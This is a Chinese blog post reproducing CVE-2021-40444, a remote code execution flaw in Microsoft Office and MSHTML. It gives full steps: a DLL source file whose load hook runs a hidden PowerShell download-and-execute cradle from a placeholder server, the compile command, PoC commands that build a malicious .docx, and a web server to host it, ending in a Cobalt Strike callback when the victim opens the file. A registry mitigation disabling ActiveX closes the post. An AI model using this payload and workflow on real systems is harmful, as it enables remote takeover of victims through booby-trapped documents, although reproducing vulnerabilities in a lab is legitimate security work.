CVE-2021-40444_复现

本文详细描述了CVE-2021-40444漏洞的复现步骤,包括下载代码、安装环境、设置服务端、制作DLL、运行Poc及生成DOCX。同时介绍了微软提供的临时禁用ActiveX控制的修复方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

描述

未经身份验证的攻击者可以利用该漏洞在目标系统上远程执行代码。微软官方表示已经监测到该漏洞存在在野利用。目前微软暂未发布相关补丁,用户可通过禁用ActiveX控件的方式暂时避免该漏洞利用

准备

1.下载github的代码
https://github.com/lockedbyte/CVE-2021-40444

2.安装lcab
sudo apt-get install lcab
在这里插入图片描述

3.安装编译环境
apt-get install mingw-w64
在这里插入图片描述

上线

设置cs,powershell,端口设置了8080

在这里插入图片描述

制作dll文件

读取REPRODUCE.md即可知道如何制作dll,shell.c记得里面的端口是8080

1.shell.c

#include <windows.h>
void exec(void) {
	system("powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://xx.xx.xx.xx:8080/a'))\"");
	return;
}
BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason, 
    LPVOID lpReserved )
{
    switch( fdwReason ) 
    { 
        case DLL_PROCESS_ATTACH:
           exec(); 
           break;

        case DLL_THREAD_ATTACH:
            break;

        case DLL_THREAD_DETACH:
            break;

        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

2.编译
i686-w64-mingw32-gcc -shared shell.c -o shell.dll
在这里插入图片描述
3.放入test目录
在这里插入图片描述

运行poc生成docx

python3 exploit.py generate test/shell.dll http://xx.xx.xx.xx #公网服务器主机
在这里插入图片描述

公网服务器主机开启web服务

python3 -m http.server 80

在目标主机打开文档即可上线

在这里插入图片描述

修复

微软提供了临时缓解措施:在 Internet Explorer 中禁用所有 ActiveX 控件的安装。

操作如下:

将如下代码复制到文本文件中并以 .reg 文件扩展名保存:


    Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]

    "1001"=dword:00000003

    "1004"=dword:00000003

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]

    "1001"=dword:00000003

    "1004"=dword:00000003

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2]

    "1001"=dword:00000003

    "1004"=dword:00000003

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]

    "1001"=dword:00000003

    "1004"=dword:00000003

2、双击该 .reg 文件。

3、重启系统。

评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值